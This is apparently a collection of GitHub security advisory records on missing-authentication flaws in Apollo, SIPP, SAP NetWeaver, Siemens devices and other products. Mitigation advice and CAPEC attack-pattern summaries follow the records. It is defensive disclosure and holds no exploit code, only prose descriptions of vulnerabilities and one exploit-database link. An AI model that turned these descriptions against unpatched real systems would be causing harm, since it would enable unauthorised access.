"details": "### Impact\nIf users expose the apollo-configservice to the internet(which is not recommended), there are potential security issues since there is no authentication feature enabled for the built-in eureka service. Malicious hackers may access eureka directly to mock apollo-configservice and apollo-adminservice .\n\n### Patches\nLogin authentication for eureka was added in https://github.com/apolloconfig/apollo/pull/4663 and was released in [v2.1.0](https://github.com/apolloconfig/apollo/releases/tag/v2.1.0).\n\n### Workarounds\nTo fix the potential issue without upgrading, simply follow the advice that does not expose apollo-configservice to the internet.\n\n### References\n[Apollo Security Guidence](https://www.apolloconfig.com/#/en/portal/apollo-user-guide?id=_71-security-related)\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [issue](https://github.com/apolloconfig/apollo/issues)\n* Email us at [apollo-config@googlegroups.com](mailto:apollo-config@googlegroups.com)",
"id": "GHSA-368x-wmmg-hq5c",
"modified": "2026-06-08T23:55:14Z",
"published": "2023-02-22T21:58:33Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/apolloconfig/apollo/security/advisories/GHSA-368x-wmmg-hq5c"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-25570"
},
{
"type": "WEB",
"url": "https://github.com/apolloconfig/apollo/pull/4663"
},
{
"type": "WEB",
"url": "https://github.com/apolloconfig/apollo/commit/7df79bf8df6960433ed4ff782a54e3dfc74632bd"
},
{
"type": "PACKAGE",
"url": "https://github.com/apolloconfig/apollo"
},
{
"type": "WEB",
"url": "https://github.com/apolloconfig/apollo/releases/tag/v2.1.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Apollo has potential access control security issue in eureka"
}
GHSA-36CW-X2XF-XMG3
Vulnerability from github – Published: 2026-03-28 12:30 – Updated: 2026-03-28 12:30SIPP 3.3 contains a stack-based buffer overflow vulnerability that allows local unauthenticated attackers to execute arbitrary code by supplying malicious input in the configuration file. Attackers can craft a configuration file with oversized values that overflow a stack buffer, overwriting the return address and executing arbitrary code through return-oriented programming gadgets.
{
"affected": [],
"aliases": [
"CVE-2018-25225"
],
"database_specific": {
"cwe_ids": [
"CWE-306"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-03-28T12:16:03Z",
"severity": "HIGH"
},
"details": "SIPP 3.3 contains a stack-based buffer overflow vulnerability that allows local unauthenticated attackers to execute arbitrary code by supplying malicious input in the configuration file. Attackers can craft a configuration file with oversized values that overflow a stack buffer, overwriting the return address and executing arbitrary code through return-oriented programming gadgets.",
"id": "GHSA-36cw-x2xf-xmg3",
"modified": "2026-03-28T12:30:30Z",
"published": "2026-03-28T12:30:30Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-25225"
},
{
"type": "WEB",
"url": "https://www.exploit-db.com/exploits/45288"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/sipp-stack-based-buffer-overflow-via-configuration-file"
},
{
"type": "WEB",
"url": "http://sipp.sourceforge.net"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-36RG-C62M-GWMX
Vulnerability from github – Published: 2024-10-17 15:31 – Updated: 2024-10-17 15:31Improper authentication vulnerability in Energy Management Controller with Cloud Services JH-RVB1 /JH-RV11 Ver.B0.1.9.1 and earlier allows a network-adjacent unauthenticated attacker to access the affected product without authentication.
{
"affected": [],
"aliases": [
"CVE-2024-23783"
],
"database_specific": {
"cwe_ids": [
"CWE-306"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-02-14T10:15:08Z",
"severity": "HIGH"
},
"details": "Improper authentication vulnerability in Energy Management Controller with Cloud Services JH-RVB1 /JH-RV11 Ver.B0.1.9.1 and earlier allows a network-adjacent unauthenticated attacker to access the affected product without authentication.",
"id": "GHSA-36rg-c62m-gwmx",
"modified": "2024-10-17T15:31:07Z",
"published": "2024-10-17T15:31:07Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23783"
},
{
"type": "WEB",
"url": "https://jp.sharp/support/taiyo/info/JVNVU94591337_en.pdf"
},
{
"type": "WEB",
"url": "https://jp.sharp/support/taiyo/info/JVNVU94591337_jp.pdf"
},
{
"type": "WEB",
"url": "https://jvn.jp/en/vu/JVNVU94591337"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-36XJ-GX8G-M5FR
Vulnerability from github – Published: 2024-09-26 18:31 – Updated: 2024-10-04 18:31The goTenna Pro series allows unauthenticated attackers to remotely update the local public keys used for P2P and Group messages.
{
"affected": [],
"aliases": [
"CVE-2024-47130"
],
"database_specific": {
"cwe_ids": [
"CWE-306"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-09-26T18:15:10Z",
"severity": "HIGH"
},
"details": "The goTenna Pro series allows unauthenticated attackers to remotely update the local public keys used for P2P and Group messages.",
"id": "GHSA-36xj-gx8g-m5fr",
"modified": "2024-10-04T18:31:09Z",
"published": "2024-09-26T18:31:45Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47130"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-270-04"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-372Q-JMW9-5MW6
Vulnerability from github – Published: 2022-05-24 17:03 – Updated: 2024-01-09 12:30A vulnerability has been identified in SiNVR 3 Central Control Server (CCS) (all versions), SiNVR 3 Video Server (all versions). The HTTP service (default port 5401/tcp) of the SiNVR 3 Video Server contains an authentication bypass vulnerability, even when properly configured with enforced authentication. A remote attacker with network access to the Video Server could exploit this vulnerability to read the SiNVR users database, including the passwords of all users in obfuscated cleartext.
{
"affected": [],
"aliases": [
"CVE-2019-18339"
],
"database_specific": {
"cwe_ids": [
"CWE-306"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-12-12T19:15:00Z",
"severity": "CRITICAL"
},
"details": "A vulnerability has been identified in SiNVR 3 Central Control Server (CCS) (all versions), SiNVR 3 Video Server (all versions). The HTTP service (default port 5401/tcp) of the SiNVR 3 Video Server contains an authentication bypass vulnerability, even when properly configured with enforced authentication. A remote attacker with network access to the Video Server could exploit this vulnerability to read the SiNVR users database, including the passwords of all users in obfuscated cleartext.",
"id": "GHSA-372q-jmw9-5mw6",
"modified": "2024-01-09T12:30:34Z",
"published": "2022-05-24T17:03:29Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-18339"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-761617.pdf"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-378P-2R6R-M338
Vulnerability from github – Published: 2025-06-11 09:30 – Updated: 2025-06-12 06:30A vulnerability has been identified in Perfect Harmony GH180 (All versions >= V8.0 < V8.3.3 with NXGPro+ controller manufactured between April 2020 to April 2025). The maintenance connection of affected devices fails to protect access to the device's control unit configuration. This could allow an attacker with physical access to the maintenance connection's door port to perform arbitrary configuration changes.
{
"affected": [],
"aliases": [
"CVE-2024-35295"
],
"database_specific": {
"cwe_ids": [
"CWE-306"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-06-11T07:15:24Z",
"severity": "MODERATE"
},
"details": "A vulnerability has been identified in Perfect Harmony GH180 (All versions \u003e= V8.0 \u003c V8.3.3 with NXGPro+ controller manufactured between April 2020 to April 2025). The maintenance connection of affected devices fails to protect access to the device\u0027s control unit configuration. This could allow an attacker with physical access to the maintenance connection\u0027s door port to perform arbitrary configuration changes.",
"id": "GHSA-378p-2r6r-m338",
"modified": "2025-06-12T06:30:27Z",
"published": "2025-06-11T09:30:32Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-35295"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-771113.html"
},
{
"type": "WEB",
"url": "https://www.innomotics.com/hub/en/ISA-771113"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:P/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-37C2-5CHG-WWJ7
Vulnerability from github – Published: 2023-07-11 03:30 – Updated: 2024-04-04 05:54SAP NetWeaver Application Server ABAP and ABAP Platform - version KRNL64NUC, 7.22, KRNL64NUC 7.22EXT, KRNL64UC 7.22, KRNL64UC 7.22EXT, KRNL64UC 7.53, KERNEL 7.22, KERNEL, 7.53, KERNEL 7.77, KERNEL 7.81, KERNEL 7.85, KERNEL 7.89, KERNEL 7.54, KERNEL 7.92, KERNEL 7.93, under some conditions, performs improper authentication checks for functionalities that require user identity. An attacker can perform malicious actions over the network, extending the scope of impact, causing a limited impact on confidentiality, integrity and availability.
{
"affected": [],
"aliases": [
"CVE-2023-35874"
],
"database_specific": {
"cwe_ids": [
"CWE-287",
"CWE-306"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-07-11T03:15:10Z",
"severity": "HIGH"
},
"details": "SAP NetWeaver Application Server ABAP and ABAP Platform - version KRNL64NUC, 7.22, KRNL64NUC 7.22EXT, KRNL64UC 7.22, KRNL64UC 7.22EXT, KRNL64UC 7.53, KERNEL 7.22, KERNEL, 7.53, KERNEL 7.77, KERNEL 7.81, KERNEL 7.85, KERNEL 7.89, KERNEL 7.54, KERNEL 7.92, KERNEL 7.93, under some conditions, performs improper authentication checks for functionalities that require user identity. An attacker can perform malicious actions over the network, extending the scope of impact, causing a limited impact on confidentiality, integrity and availability.\n\n",
"id": "GHSA-37c2-5chg-wwj7",
"modified": "2024-04-04T05:54:41Z",
"published": "2023-07-11T03:30:31Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35874"
},
{
"type": "WEB",
"url": "https://me.sap.com/notes/3318850"
},
{
"type": "WEB",
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:L",
"type": "CVSS_V3"
}
]
}
Mitigation
- Divide the software into anonymous, normal, privileged, and administrative areas. Identify which of these areas require a proven user identity, and use a centralized authentication capability.
- Identify all potential communication channels, or other means of interaction with the software, to ensure that all channels are appropriately protected, including those channels that are assumed to be accessible only by authorized parties. Developers sometimes perform authentication at the primary channel, but open up a secondary channel that is assumed to be private. For example, a login mechanism may be listening on one network port, but after successful authentication, it may open up a second port where it waits for the connection, but avoids authentication because it assumes that only the authenticated party will connect to the port.
- In general, if the software or protocol allows a single session or user state to persist across multiple connections or channels, authentication and appropriate credential management need to be used throughout.
Mitigation MIT-15
For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
Mitigation
- Where possible, avoid implementing custom, "grow-your-own" authentication routines and consider using authentication capabilities as provided by the surrounding framework, operating system, or environment. These capabilities may avoid common weaknesses that are unique to authentication; support automatic auditing and tracking; and make it easier to provide a clear separation between authentication tasks and authorization tasks.
- In environments such as the World Wide Web, the line between authentication and authorization is sometimes blurred. If custom authentication routines are required instead of those provided by the server, then these routines must be applied to every single page, since these pages could be requested directly.
Mitigation MIT-4.5
Strategy: Libraries or Frameworks
- Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
- For example, consider using libraries with authentication capabilities such as OpenSSL or the ESAPI Authenticator [REF-45].
Mitigation
When storing data in the cloud (e.g., S3 buckets, Azure blobs, Google Cloud Storage, etc.), use the provider's controls to require strong authentication for users who should be allowed to access the data [REF-1297] [REF-1298] [REF-1302].
CAPEC-12: Choosing Message Identifier
This pattern of attack is defined by the selection of messages distributed via multicast or public information channels that are intended for another client by determining the parameter value assigned to that client. This attack allows the adversary to gain access to potentially privileged information, and to possibly perpetrate other attacks through the distribution means by impersonation. If the channel/message being manipulated is an input rather than output mechanism for the system, (such as a command bus), this style of attack could be used to change the adversary's identifier to more a privileged one.
CAPEC-166: Force the System to Reset Values
An attacker forces the target into a previous state in order to leverage potential weaknesses in the target dependent upon a prior configuration or state-dependent factors. Even in cases where an attacker may not be able to directly control the configuration of the targeted application, they may be able to reset the configuration to a prior state since many applications implement reset functions.
CAPEC-216: Communication Channel Manipulation
An adversary manipulates a setting or parameter on communications channel in order to compromise its security. This can result in information exposure, insertion/removal of information from the communications stream, and/or potentially system compromise.
CAPEC-36: Using Unpublished Interfaces or Functionality
An adversary searches for and invokes interfaces or functionality that the target system designers did not intend to be publicly available. If interfaces fail to authenticate requests, the attacker may be able to invoke functionality they are not authorized for.
CAPEC-62: Cross Site Request Forgery
An attacker crafts malicious web links and distributes them (via web pages, email, etc.), typically in a targeted manner, hoping to induce users to click on the link and execute the malicious action against some third-party application. If successful, the action embedded in the malicious link will be processed and accepted by the targeted application with the users' privilege level. This type of attack leverages the persistence and implicit trust placed in user session cookies by many web applications today. In such an architecture, once the user authenticates to an application and a session cookie is created on the user's system, all following transactions for that session are authenticated using that cookie including potential actions initiated by an attacker and simply "riding" the existing session cookie.